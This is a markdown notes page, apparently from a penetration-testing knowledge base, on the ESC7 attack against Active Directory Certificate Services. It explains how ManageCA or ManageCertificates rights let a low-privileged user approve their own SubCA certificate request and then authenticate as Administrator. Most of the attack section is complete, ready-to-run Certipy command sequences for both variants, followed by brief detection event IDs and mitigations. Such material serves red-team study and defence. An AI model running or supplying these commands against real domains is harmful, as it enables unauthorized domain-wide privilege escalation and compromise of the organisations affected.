attack-32-esc7-vulnerable-ca-officer-permissions.md (4830B)
1 --- 2 title: "Attack #32 β ESC7 Vulnerable CA Officer Permissions" 3 description: "ESC7 exploits overly permissive CA permissions. If a low-privileged user has ManageCA rights on the Certificate Authority, they can grant themselvesβ¦" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "privilege-escalation"] 7 tools: ["Certipy"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/π’ Attack #32 β ESC7 Vulnerable CA Officer Permissions.md" 11 --- 12 # π’ Attack #32 β ESC7: Vulnerable CA Officer Permissions 13 14 *** 15 16 ## π How It Works 17 18 ESC7 exploits **overly permissive CA permissions**. If a low-privileged user has **ManageCA** rights on the Certificate Authority, they can grant themselves **ManageCertificates** (Certificate Officer) rights, then approve their own failed/pending certificate requests β including requests for the SubCA template, which grants full CA-level authority. 19 20 ### Two Sub-Variants 21 22 | Variant | Permission | Exploitation | 23 |---|---|---| 24 | **ESC7a** | ManageCA | Self-grant ManageCertificates β approve own requests | 25 | **ESC7b** | ManageCertificates | Directly approve pending/failed requests | 26 27 ### Attack Flow (ESC7a β ManageCA) 28 29 ``` 30 1. Have ManageCA permission on the CA 31 2. Grant yourself ManageCertificates via CERTSRV.MSC or Certipy 32 3. Enable the SubCA template (if not already enabled) 33 4. Request a certificate using the SubCA template (will fail initially) 34 5. Use ManageCertificates to approve the failed request 35 6. Retrieve the issued certificate 36 7. Authenticate as any user 37 ``` 38 39 *** 40 41 ## βοΈ Prerequisites 42 43 | Requirement | Detail | 44 |---|---| 45 | **ManageCA or ManageCertificates on CA** | Check CA permissions | 46 | **Domain user account** | Principal with overly permissive CA rights | 47 48 *** 49 50 ## π» Full Commands 51 52 ### π΄ ESC7a β ManageCA β ManageCertificates β SubCA 53 54 ```bash 55 # ββ Step 1: Add yourself as officer (grant ManageCertificates) ββββββββββββββββ 56 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 57 -add-officer low_user -dc-ip 10.10.10.10 58 59 # ββ Step 2: Enable SubCA template ββββββββββββββββββββββββββββββββββββββββββββ 60 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 61 -enable-template SubCA -dc-ip 10.10.10.10 62 63 # ββ Step 3: Request SubCA certificate (will fail β needs approval) βββββββββββ 64 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 65 -template SubCA -upn Administrator@corp.local -dc-ip 10.10.10.10 66 # Note the Request ID from the output (e.g., Request ID: 42) 67 68 # ββ Step 4: Approve the failed request (using ManageCertificates) ββββββββββββ 69 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 70 -issue-request 42 -dc-ip 10.10.10.10 71 72 # ββ Step 5: Retrieve the issued certificate βββββββββββββββββββββββββββββββββββ 73 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 74 -retrieve 42 -dc-ip 10.10.10.10 75 76 # ββ Step 6: Authenticate ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 77 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 78 ``` 79 80 ### π΄ ESC7b β ManageCertificates Direct 81 82 ```bash 83 # ββ If you already have ManageCertificates, skip the officer step βββββββββββββ 84 # Request + approve flow is the same as steps 3-6 above 85 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 86 -template SubCA -upn Administrator@corp.local -dc-ip 10.10.10.10 87 88 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 89 -issue-request <ID> -dc-ip 10.10.10.10 90 91 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 92 -retrieve <ID> -dc-ip 10.10.10.10 93 94 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 95 ``` 96 97 *** 98 99 ## π‘οΈ Detection β Event IDs 100 101 | Event ID | Source | What to Look For | 102 |---|---|---| 103 | **4890** | Security Log (CA) | CA security settings changed (officer added) | 104 | **4886** | Security Log (CA) | Certificate request for SubCA template | 105 | **4887** | Security Log (CA) | Certificate issued after manual approval | 106 107 *** 108 109 ## π Attack Chain Context 110 111 ``` 112 [ESC7] βββ CA permissions abuse β approve own requests β domain compromise 113 β 114 ββββ π ManageCA β self-grant ManageCertificates β approve SubCA requests 115 ββββ π SubCA cert = full CA authority 116 ββββ π Defeated by: restrict ManageCA/ManageCertificates, audit CA permissions 117 ``` 118 119 *** 120 121 > β **Attack #32 β ESC7 complete.**